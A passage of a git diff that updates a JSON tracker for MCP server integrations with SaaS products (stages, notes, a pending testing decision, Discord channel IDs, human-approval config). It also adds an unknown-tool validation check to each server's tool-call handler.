false, "blockerNote": "", "notes": "22 tools, 5 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "twilio", "name": "Twilio MCP", "type": "BIG4", "stage": 8, "tools": 54, "apps": 19, "blocked": false, "blockerNote": "", "notes": "54 tools, 19 UI apps. Integrated into LocalBosses.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "ghl", "name": "GoHighLevel MCP", "type": "GHL", "stage": 8, "tools": 240, "apps": 65, "blocked": false, "blockerNote": "", "notes": "65 apps, ~240 tools. 3 review rounds. All builds passing.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "acuity-scheduling", "name": "Acuity Scheduling", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "bamboohr", "name": "BambooHR", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "basecamp", "name": "Basecamp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "bigcommerce", "name": "BigCommerce", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "brevo", "name": "Brevo", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "calendly", "name": "Calendly", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "clickup", "name": "ClickUp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "close", "name": "Close", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "clover", "name": "Clover", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "constant-contact", "name": "Constant Contact", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "fieldedge", "name": "FieldEdge", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "freshbooks", "name": "FreshBooks", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "freshdesk", "name": "FreshDesk", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "gusto", "name": "Gusto", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "helpscout", "name": "HelpScout", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "housecall-pro", "name": "Housecall Pro", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "jobber", "name": "Jobber", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "keap", "name": "Keap", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "lightspeed", "name": "Lightspeed", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "mailchimp", "name": "Mailchimp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "pipedrive", "name": "Pipedrive", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "rippling", "name": "Rippling", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "servicetitan", "name": "ServiceTitan", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "squarespace", "name": "Squarespace", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "toast", "name": "Toast", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "touchbistro", "name": "TouchBistro", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "trello", "name": "Trello", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "wave", "name": "Wave", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "wrike", "name": "Wrike", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "zendesk", "name": "Zendesk", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] } + ], + "decisions": { + "pending": [ + { + "id": "dec-001", + "type": "pipeline-wide", + "stage": "8→9", + "question": "Testing strategy: structural-only vs live API vs hybrid", + "options": { + "A": "Structural test harness → advance to Stage 9", + "B": "Hold at Stage 8 until API keys provided", + "C": "Hybrid — structural → Stage 9, live API gates Stage 10" + }, + "recommendation": "C", + "discordMessageId": "1468773655801757849", + "channel": "pipeline-decisions", + "posted": "2026-02-05T01:00:00Z", + "status": "awaiting-reaction" + } + ], + "history": [] + }, + "discord": { + "guildId": "1458233582404501547", + "categoryId": "1468757930940698675", + "channels": { + "pipeline-decisions": "1468757982140567676", + "design-reviews": "1468757983428083762", + "pipeline-standup": "1468757984384389234", + "build-log": "1468757986422820864", + "blockers": "1468757987412938945", + "mcp-strategy": "1468757988448669829", + "shipped": "1468757989497507870" + } + }, + "config": { + "heartbeatIntervalMinutes": 60, + "maxAutoRetries": 2, + "humanApprovalRequired": [4, 7, 15, 16, 22, 23, 24], + "designApprovalRequired": [7], + "autoAdvanceStages": [1, 2, 3, 5, 6, 8, 9, 10, 11, 12, 13, 14], + "standupTime": "09:00", + "standupTimezone": "America/New_York" + } +} diff --git a/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts b/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts index 0030de0..1476b16 100644 --- a/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts +++ b/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -261,6 +263,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/bamboohr/src/index.ts b/mcp-diagrams/mcp-servers/bamboohr/src/index.ts index b2fbeb0..2e97ad4 100644 --- a/mcp-diagrams/mcp-servers/bamboohr/src/index.ts +++ b/mcp-diagrams/mcp-servers/bamboohr/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -299,6 +301,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/basecamp/src/index.ts b/mcp-diagrams/mcp-servers/basecamp/src/index.ts index 4854d41..b600df2 100644 --- a/mcp-diagrams/mcp-servers/basecamp/src/index.ts +++ b/mcp-diagrams/mcp-servers/basecamp/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -290,6 +292,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts b/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts index 2e389cd..5c11adc 100644 --- a/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts +++ b/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -391,6 +393,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/brevo/src/index.ts b/mcp-diagrams/mcp-servers/brevo/src/index.ts index e779557..94c4055 100644 --- a/mcp-diagrams/mcp-servers/brevo/src/index.ts +++ b/mcp-diagrams/mcp-servers/brevo/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -370,6 +372,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/calendly/src/index.ts b/mcp-diagrams/mcp-servers/calendly/src/index.ts index c9e4f2e..26ed03f 100644 --- a/mcp-diagrams/mcp-servers/calendly/src/index.ts +++ b/mcp-diagrams/mcp-servers/calendly/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -248,6 +250,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/clickup/src/index.ts b/mcp-diagrams/mcp-servers/clickup/src/index.ts index 687a635..1f8348c 100644 --- a/mcp-diagrams/mcp-servers/clickup/src/index.ts +++ b/mcp-diagrams/mcp-servers/clickup/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -481,6 +483,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/close/src/index.ts b/mcp-diagrams/mcp-servers/close/src/index.ts index b0040b3..13b2d2d 100644 --- a/mcp-diagrams/mcp-servers/close/src/index.ts +++ b/mcp-diagrams/mcp-servers/close/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -453,6 +455,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/clover/src/index.ts b/mcp-diagrams/mcp-servers/clover/src/index.ts index 95c6174..58341da 100644 --- a/mcp-diagrams/mcp-servers/clover/src/index.ts +++ b/mcp-diagrams/mcp-servers/clover/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -326,6 +328,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/constant-contact/src/index.ts b/mcp-diagrams/mcp-servers/constant-contact/src/index.ts index b920da1..d282621 100644 --- a/mcp-diagrams/mcp-servers/constant-contact/src/index.ts +++ b/mcp-diagrams/mcp-servers/constant-contact/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -384,6 +386,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/fieldedge/src/index.ts b/mcp-diagrams/mcp-servers/fieldedge/src/index.ts index 885285f..b5bbf0e 100644 --- a/mcp-diagrams/mcp-servers/fieldedge/src/index.ts +++ b/mcp-diagrams/mcp-servers/fieldedge/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -368,6 +370,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/freshbooks/src/index.ts b/mcp-diagrams/mcp-servers/freshbooks/src/index.ts index 01928b3..242d424 100644 --- a/mcp-diagrams/mcp-servers/freshbooks/src/index.ts +++ b/mcp-diagrams/mcp-servers/freshbooks/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -421,6 +423,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/freshdesk/src/index.ts b/mcp-diagrams/mcp-servers/freshdesk/src/index.ts index 527865c..aa1b573 100644 --- a/mcp-diagrams/mcp-servers/freshdesk/src/index.ts +++ b/mcp-diagrams/mcp-servers/freshdesk/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -369,6 +371,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/gusto/src/index.ts b/mcp-diagrams/mcp-servers/gusto/src/index.ts index 709f136..fd26747 100644 --- a/mcp-diagrams/mcp-servers/gusto/src/index.ts +++ b/mcp-diagrams/mcp-servers/gusto/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -255,6 +257,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/helpscout/src/index.ts b/mcp-diagrams/mcp-servers/helpscout/src/index.ts index 285b57d..2955222 100644 --- a/mcp-diagrams/mcp-servers/helpscout/src/index.ts +++ b/mcp-diagrams/mcp-servers/helpscout/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -310,6 +312,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts b/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts index 0aaf221..85d147c 100644 --- a/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts +++ b/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -362,6 +364,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/jobber/src/index.ts b/mcp-diagrams/mcp-servers/jobber/src/index.ts index 7eea1f7..2ecbfb0 100644 --- a/mcp-diagrams/mcp-servers/jobber/src/index.ts +++ b/mcp-diagrams/mcp-servers/jobber/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -493,6 +495,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/keap/src/index.ts b/mcp-diagrams/mcp-servers/keap/src/index.ts index 01fb7cc..a80015d 100644 --- a/mcp-diagrams/mcp-servers/keap/src/index.ts +++ b/mcp-diagrams/mcp-servers/keap/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -407,6 +409,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/lightspeed/src/index.ts b/mcp-diagrams/mcp-servers/lightspeed/src/index.ts index b37983a..d04650e 100644 --- a/mcp-diagrams/mcp-servers/lightspeed/src/index.ts +++ b/mcp-diagrams/mcp-servers/lightspeed/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -307,6 +309,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/mailchimp/src/index.ts b/mcp-diagrams/mcp-servers/mailchimp/src/index.ts index 3eb46f0..05c63cf 100644 --- a/mcp-diagrams/mcp-servers/mailchimp/src/index.ts +++ b/mcp-diagrams/mcp-servers/mailchimp/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; import { createHash } from "crypto"; @@ -353,6 +355,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/pipedrive/src/index.ts b/mcp-diagrams/mcp-servers/pipedrive/src/index.ts index 6b2617b..520b6e5 100644 --- a/mcp-diagrams/mcp-servers/pipedrive/src/index.ts +++ b/mcp-diagrams/mcp-servers/pipedrive/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -304,6 +306,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/rippling/src/index.ts b/mcp-diagrams/mcp-servers/rippling/src/index.ts index 4892765..816f194 100644 --- a/mcp-diagrams/mcp-servers/rippling/src/index.ts +++ b/mcp-diagrams/mcp-servers/rippling/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -330,6 +332,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/servicetitan/src/index.ts b/mcp-diagrams/mcp-servers/servicetitan/src/index.ts index 48491ba..1573446 100644 --- a/mcp-diagrams/mcp-servers/servicetitan/src/index.ts +++ b/mcp-diagrams/mcp-servers/servicetitan/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -369,6 +371,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/squarespace/src/index.ts b/mcp-diagrams/mcp-servers/squarespace/src/index.ts index baa6007..d114013 100644 --- 